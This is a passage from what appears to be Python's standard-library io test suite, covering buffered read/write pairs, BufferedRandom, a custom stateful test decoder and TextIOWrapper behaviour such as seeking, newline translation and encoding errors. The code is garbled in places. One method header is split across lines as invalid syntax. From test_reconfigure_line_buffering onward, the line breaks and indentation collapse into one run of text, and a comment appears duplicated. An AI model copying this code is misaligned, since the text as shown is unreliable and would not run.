        self.assertIn('writer_non_existing', str(err.exception.__context__))
        self.assertFalse(pair.closed)
        self.assertFalse(reader.closed)
        self.assertFalse(writer.closed)

        # Silence destructor error
        reader.close = lambda: None
        writer.close = lambda: None

    def test_isatty(self):
        # A pair is a tty if either side is a tty.
        class SelectableIsAtty(MockRawIO):
            def __init__(self, isatty):
                MockRawIO.__init__(self)
                self._isatty = isatty

            def isatty(self):
                return self._isatty

        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
        self.assertFalse(pair.isatty())

        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
        self.assertTrue(pair.isatty())

        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

    def test_weakref_clearing(self):
        brw = self.tp(self.MockRawIO(), self.MockRawIO())
        ref = weakref.ref(brw)
        brw = None
        ref = None  # Shouldn't segfault.


class CBufferedRWPairTest(BufferedRWPairTest):
    tp = io.BufferedRWPair


class PyBufferedRWPairTest(BufferedRWPairTest):
    tp = pyio.BufferedRWPair


class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    # Inherits both reader and writer suites; exercises mixed read/write.
    read_mode = "rb+"
    write_mode = "wb+"

    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)

    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)

    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)

        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack)  # Buffer writes
        self.assertEqual(b"ghjk", rw.read())
        self.assertEqual(b"dddeee", raw._write_stack[0])

    def test_seek_and_tell(self):
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)

        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))

        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        rw.seek(-4, 2)
        self.assertEqual(5, rw.tell())
        rw.seek(2, 1)
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())
        self.assertRaises(TypeError, rw.seek, 0.0)

    def check_flush_and_read(self, read_func):
        # Interleave reads (via read_func) with writes and flushes; flush()
        # must reset the read buffer so later reads see raw-stream changes.
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)

        self.assertEqual(b"ab", read_func(bufio, 2))
        bufio.write(b"12")
        self.assertEqual(b"ef", read_func(bufio, 2))
        self.assertEqual(6, bufio.tell())
        bufio.flush()
        self.assertEqual(6, bufio.tell())
        self.assertEqual(b"ghi", read_func(bufio))
        raw.seek(0, 0)
        raw.write(b"XYZ")
        # flush() resets the read buffer
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"XYZ", read_func(bufio, 3))

    def test_flush_and_read(self):
        self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))

    def test_flush_and_readinto(self):
        def _readinto(bufio, n=-1):
            b = bytearray(n if n >= 0 else 9999)
            n = bufio.readinto(b)
            return bytes(b[:n])
        self.check_flush_and_read(_readinto)

    def test_flush_and_peek(self):
        def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream, otherwise peek() can return less.
            b = bufio.peek(n)
            if n != -1:
                b = b[:n]
            bufio.seek(len(b), 1)
            return b
        self.check_flush_and_read(_peek)

    def test_flush_and_write(self):
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)

        bufio.write(b"123")
        bufio.flush()
        bufio.write(b"45")
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"12345fghi", raw.getvalue())
        self.assertEqual(b"12345fghi", bufio.read())

    def test_threads(self):
        BufferedReaderTest.test_threads(self)
        BufferedWriterTest.test_threads(self)

    def test_writes_and_peek(self):
        def _peek(bufio):
            bufio.peek(1)
        self.check_writes(_peek)
        def _peek(bufio):
            pos = bufio.tell()
            bufio.seek(-1, 1)
            bufio.peek(1)
            bufio.seek(pos, 0)
        self.check_writes(_peek)

    def test_writes_and_reads(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.read(1)
        self.check_writes(_read)

    def test_writes_and_read1s(self):
        def _read1(bufio):
            bufio.seek(-1, 1)
            bufio.read1(1)
        self.check_writes(_read1)

    def test_writes_and_readintos(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.readinto(bytearray(1))
        self.check_writes(_read)

    def
        test_write_after_readahead(self):
        # Issue #6629: writing after the buffer was filled by readahead should
        # first rewind the raw stream.
        for overwrite_size in [1, 5]:
            raw = self.BytesIO(b"A" * 10)
            bufio = self.tp(raw, 4)
            # Trigger readahead
            self.assertEqual(bufio.read(1), b"A")
            self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs so
            bufio.write(b"B" * overwrite_size)
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            # If the write size was smaller than the buffer size, flush() and
            # check that rewind happens.
            bufio.flush()
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            s = raw.getvalue()
            self.assertEqual(s,
                b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))

    def test_write_rewind_write(self):
        # Various combinations of reading / writing / seeking backwards / writing again
        def mutate(bufio, pos1, pos2):
            assert pos2 >= pos1
            # Fill the buffer
            bufio.seek(pos1)
            bufio.read(pos2 - pos1)
            bufio.write(b'\x02')
            # This writes earlier than the previous write, but still inside
            # the buffer.
            bufio.seek(pos1)
            bufio.write(b'\x01')

        # (continuation of test_write_rewind_write) exhaustively mutate every
        # (i, j) position pair and check both writes land where expected.
        b = b"\x80\x81\x82\x83\x84"
        for i in range(0, len(b)):
            for j in range(i, len(b)):
                raw = self.BytesIO(b)
                bufio = self.tp(raw, 100)
                mutate(bufio, i, j)
                bufio.flush()
                expected = bytearray(b)
                expected[j] = 2
                expected[i] = 1
                self.assertEqual(raw.getvalue(), expected,
                                 "failed result for i=%d, j=%d" % (i, j))

    def test_truncate_after_read_or_write(self):
        raw = self.BytesIO(b"A" * 10)
        bufio = self.tp(raw, 100)
        self.assertEqual(bufio.read(2), b"AA")  # the read buffer gets filled
        self.assertEqual(bufio.truncate(), 2)
        self.assertEqual(bufio.write(b"BB"), 2)  # the write buffer increases
        self.assertEqual(bufio.truncate(), 4)

    def test_misbehaved_io(self):
        BufferedReaderTest.test_misbehaved_io(self)
        BufferedWriterTest.test_misbehaved_io(self)

    def test_interleaved_read_write(self):
        # Test for issue #12213
        with self.BytesIO(b'abcdefgh') as raw:
            with self.tp(raw, 100) as f:
                f.write(b"1")
                self.assertEqual(f.read(1), b'b')
                f.write(b'2')
                self.assertEqual(f.read1(1), b'd')
                f.write(b'3')
                buf = bytearray(1)
                f.readinto(buf)
                self.assertEqual(buf, b'f')
                f.write(b'4')
                self.assertEqual(f.peek(1), b'h')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b2d3f4h')

        with self.BytesIO(b'abc') as raw:
            with self.tp(raw, 100) as f:
                self.assertEqual(f.read(1), b'a')
                f.write(b"2")
                self.assertEqual(f.read(1), b'c')
                f.flush()
                self.assertEqual(raw.getvalue(), b'a2c')

    def test_interleaved_readline_write(self):
        with self.BytesIO(b'ab\ncdef\ng\n') as raw:
            with self.tp(raw) as f:
                f.write(b'1')
                self.assertEqual(f.readline(), b'b\n')
                f.write(b'2')
                self.assertEqual(f.readline(), b'def\n')
                f.write(b'3')
                self.assertEqual(f.readline(), b'\n')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')

    # You can't construct a BufferedRandom over a non-seekable stream.
    test_unseekable = None

    # writable() returns True, so there's no point to test it over
    # a writable stream.
    # Disable the inherited read-only test: a BufferedRandom stream is
    # always writable, so the test is meaningless here.
    test_truncate_on_read_only = None


class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
    tp = io.BufferedRandom

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_garbage_collection(self):
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)


class PyBufferedRandomTest(BufferedRandomTest):
    tp = pyio.BufferedRandom


# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
#   - A single output character can correspond to many bytes of input.
#   - The number of input bytes to complete the character can be
#     undetermined until the last input byte is received.
#   - The number of input bytes can vary depending on previous input.
#   - A single input byte can correspond to many characters of output.
#   - The number of output characters can be undetermined until the
#     last input byte is received.
#   - The number of output characters can vary depending on previous input.

class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    For testing seek/tell behavior with a stateful, buffering decoder.

    Input is a sequence of words.  Words may be fixed-length (length set
    by input) or variable-length (period-terminated).  In variable-length
    mode, extra periods are ignored.  Possible words are:
      - 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are space-terminated.
      - 'o' followed by a number sets the output length, O (maximum 99).
      - Any other word is converted into a word followed by a period on
        the output.  The output word consists of the input word truncated
        or padded out with hyphens to make its length equal to O.  If O
        is 0, the word is output verbatim without truncating or padding.
    I and O are initially set to 1.  When I changes, any buffered input is
    re-scanned according to the new I.  EOF also terminates the last word.
    """

    def __init__(self, errors='strict'):
        codecs.IncrementalDecoder.__init__(self, errors)
        self.reset()

    def __repr__(self):
        return '<SID %x>' % id(self)

    def reset(self):
        # i: current input word length; o: current output word length;
        # buffer: bytes of the word being accumulated.
        self.i = 1
        self.o = 1
        self.buffer = bytearray()

    def getstate(self):
        i, o = self.i ^ 1, self.o ^ 1  # so that flags = 0 after reset()
        return bytes(self.buffer), i*100 + o

    def setstate(self, state):
        # Inverse of getstate(): unpack the (buffer, flags) pair.
        buffer, io = state
        self.buffer = bytearray(buffer)
        i, o = divmod(io, 100)
        self.i, self.o = i ^ 1, o ^ 1

    def decode(self, input, final=False):
        output = ''
        for b in input:
            if self.i == 0:  # variable-length, terminated with period
                if b == ord('.'):
                    if self.buffer:
                        output += self.process_word()
                else:
                    self.buffer.append(b)
            else:  # fixed-length, terminate after self.i bytes
                self.buffer.append(b)
                if len(self.buffer) == self.i:
                    output += self.process_word()
        if final and self.buffer:  # EOF terminates the last word
            output += self.process_word()
        return output

    def process_word(self):
        # Consume the buffered word: either an 'i'/'o' control word that
        # updates state, or a payload word emitted padded/truncated to O.
        output = ''
        if self.buffer[0] == ord('i'):
            self.i = min(99, int(self.buffer[1:] or 0))  # set input length
        elif self.buffer[0] == ord('o'):
            self.o = min(99, int(self.buffer[1:] or 0))  # set output length
        else:
            output = self.buffer.decode('ascii')
            if len(output) < self.o:
                output += '-'*self.o  # pad out with hyphens
            if self.o:
                output = output[:self.o]  # truncate to output length
            output += '.'
        self.buffer = bytearray()
        return output

    # When False, lookupTestDecoder() refuses to resolve 'test_decoder';
    # tests flip this on to activate the codec.
    codecEnabled = False

    @classmethod
    def lookupTestDecoder(cls, name):
        if cls.codecEnabled and name == 'test_decoder':
            latin1 = codecs.lookup('latin-1')
            return codecs.CodecInfo(
                name='test_decoder', encode=latin1.encode, decode=None,
                incrementalencoder=None,
                streamreader=None, streamwriter=None,
                incrementaldecoder=cls)

# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)


class StatefulIncrementalDecoderTest(unittest.TestCase):
    """
    Make sure the StatefulIncrementalDecoder actually works.
    """

    # (input bytes, final flag, expected decoded output)
    test_cases = [
        # I=1, O=1 (fixed-length input == fixed-length output)
        (b'abcd', False, 'a.b.c.d.'),
        # I=0, O=0 (variable-length input, variable-length output)
        (b'oiabcd', True, 'abcd.'),
        # I=0, O=0 (should ignore extra periods)
        (b'oi...abcd...', True, 'abcd.'),
        # I=0, O=6 (variable-length input, fixed-length output)
        (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
        # I=2, O=6 (fixed-length input < fixed-length output)
        (b'i.i2.o6xyz', True, 'xy----.z-----.'),
        # I=6, O=3 (fixed-length input > fixed-length output)
        (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
        # I=0, then 3; O=29, then 15 (with longer output)
        (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
         'a----------------------------.' +
         'b----------------------------.' +
         'cde--------------------------.' +
         'abcdefghijabcde.' +
         'a.b------------.' +
         '.c.------------.' +
         'd.e------------.' +
         'k--------------.' +
         'l--------------.' +
         'm--------------.')
    ]

    def test_decoder(self):
        # Try a few one-shot test cases.
        for input, eof, output in self.test_cases:
            d = StatefulIncrementalDecoder()
            self.assertEqual(d.decode(input, eof), output)

        # Also test an unfinished decode, followed by forcing EOF.
        d = StatefulIncrementalDecoder()
        self.assertEqual(d.decode(b'oiabcd'), '')
        self.assertEqual(d.decode(b'', 1), 'abcd.')


class TextIOWrapperTest(unittest.TestCase):

    def setUp(self):
        # testdata mixes \r\n, \r and \n line endings; normalized is the
        # universal-newlines translation of it.
        self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
        self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
        os_helper.unlink(os_helper.TESTFN)

    def tearDown(self):
        os_helper.unlink(os_helper.TESTFN)

    def test_constructor(self):
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        t.__init__(b, encoding="latin-1", newline="\r\n")
        self.assertEqual(t.encoding, "latin-1")
        self.assertEqual(t.line_buffering, False)
        t.__init__(b, encoding="utf-8", line_buffering=True)
        self.assertEqual(t.encoding, "utf-8")
        self.assertEqual(t.line_buffering, True)
        self.assertEqual("\xe9\n", t.readline())
        self.assertRaises(TypeError, t.__init__, b, newline=42)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')

    def test_uninitialized(self):
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        del t
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               t.read, 0)
        t.__init__(self.MockRawIO())
        self.assertEqual(t.read(0), '')

    def test_non_text_encoding_codecs_are_rejected(self):
        # Ensure the constructor complains if passed a codec that isn't
        # marked as a text encoding
        # http://bugs.python.org/issue20404
        r = self.BytesIO()
        b = self.BufferedWriter(r)
        with self.assertRaisesRegex(LookupError, "is not a text encoding"):
            self.TextIOWrapper(b, encoding="hex")

    def test_detach(self):
        r = self.BytesIO()
        b = self.BufferedWriter(r)
        t = self.TextIOWrapper(b)
        self.assertIs(t.detach(), b)

        t = self.TextIOWrapper(b, encoding="ascii")
        t.write("howdy")
        self.assertFalse(r.getvalue())
        t.detach()
        self.assertEqual(r.getvalue(), b"howdy")
        self.assertRaises(ValueError, t.detach)

        # Operations independent of the detached stream should still work
        repr(t)
        self.assertEqual(t.encoding, "ascii")
        self.assertEqual(t.errors, "strict")
        self.assertFalse(t.line_buffering)
        self.assertFalse(t.write_through)

    def test_repr(self):
        # repr() must reflect name/mode/encoding as they become available.
        raw = self.BytesIO("hello".encode("utf-8"))
        b = self.BufferedReader(raw)
        t = self.TextIOWrapper(b, encoding="utf-8")
        modname = self.TextIOWrapper.__module__
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
        raw.name = "dummy"
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
        t.mode = "r"
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
        raw.name = b"dummy"
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)

        t.buffer.detach()
        repr(t)  # Should not raise an exception

    def test_recursive_repr(self):
        # Issue #25455
        raw = self.BytesIO()
        t = self.TextIOWrapper(raw)
        with support.swap_attr(raw, 'name', t):
            try:
                repr(t)  # Should not crash
            except RuntimeError:
                pass

    def test_line_buffering(self):
        r = self.BytesIO()
        b = self.BufferedWriter(r, 1000)
        t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
        t.write("X")
        self.assertEqual(r.getvalue(), b"")  # No flush happened
        t.write("Y\nZ")
        self.assertEqual(r.getvalue(), b"XY\nZ")  # All got flushed
        t.write("A\rB")
        self.assertEqual(r.getvalue(), b"XY\nZA\rB")

    def test_reconfigure_line_buffering(self):
        r = self.BytesIO()
        b = self.BufferedWriter(r, 1000)
        t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
        t.write("AB\nC")
        self.assertEqual(r.getvalue(), b"")

        t.reconfigure(line_buffering=True)   # implicit flush
        self.assertEqual(r.getvalue(), b"AB\nC")
        t.write("DEF\nG")
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
        t.write("H")
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
        t.reconfigure(line_buffering=False)  # implicit flush
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
        t.write("IJ")
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")

        # Keeping default value
        t.reconfigure()
t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, 
encoding="ascii", errors="replace") self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. 
for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): 
l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(os_helper.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(os_helper.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def 
multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(os_helper.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(os_helper.TESTFN, "wb") as f: f.write(line*2) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(os_helper.TESTFN, "wb") as f: f.write(data) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. 
# Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(os_helper.TESTFN, 'wb') f.write(data) f.close() f = self.open(os_helper.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(os_helper.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. 
finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 